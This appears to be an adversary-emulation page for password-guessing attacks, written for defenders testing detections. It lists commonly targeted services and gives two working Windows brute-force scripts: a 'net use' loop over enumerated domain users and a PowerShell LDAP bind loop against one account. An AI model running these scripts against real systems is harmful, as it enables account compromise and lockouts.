Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:
- SSH (22/TCP)
- Telnet (23/TCP)
- FTP (21/TCP)
- NetBIOS / SMB / Samba (139/TCP & 445/TCP)
- LDAP (389/TCP)
- Kerberos (88/TCP)
- RDP / Terminal Services (3389/TCP)
- HTTP/HTTP Management Services (80/TCP & 443/TCP)
- MSSQL (1433/TCP)
- Oracle (1521/TCP)
- MySQL (3306/TCP)
- VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
Creates username and password files then attempts to brute force on remote host
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt |
| input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt |
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$ |
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY |
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NULAtomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| user | Account to bruteforce | String | bruce.wayne |
| passwords | List of passwords we will attempt to brute force with | String | Password1n1q2w3e4rnPassword! |
| domain | Domain FQDN | String | contoso.com |
| auth | authentication method to choose between "NTLM" and "Kerberos" | string | NTLM |
if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) {
Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
exit 1
}
[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)
$passwords = "#{passwords}".split("{`n}")
foreach ($password in $passwords){
$credz = new-object System.Net.NetworkCredential("#{user}", $password, "#{domain}")
$conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
try {
Write-Host " [-] Attempting ${password} on account #{user}."
$conn.bind()
# if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
Write-Host " [!] #{user}:${password} are valid credentials!"
} catch {
Write-Host $_.Exception.Message
}
}
Write-Host "End of bruteforce"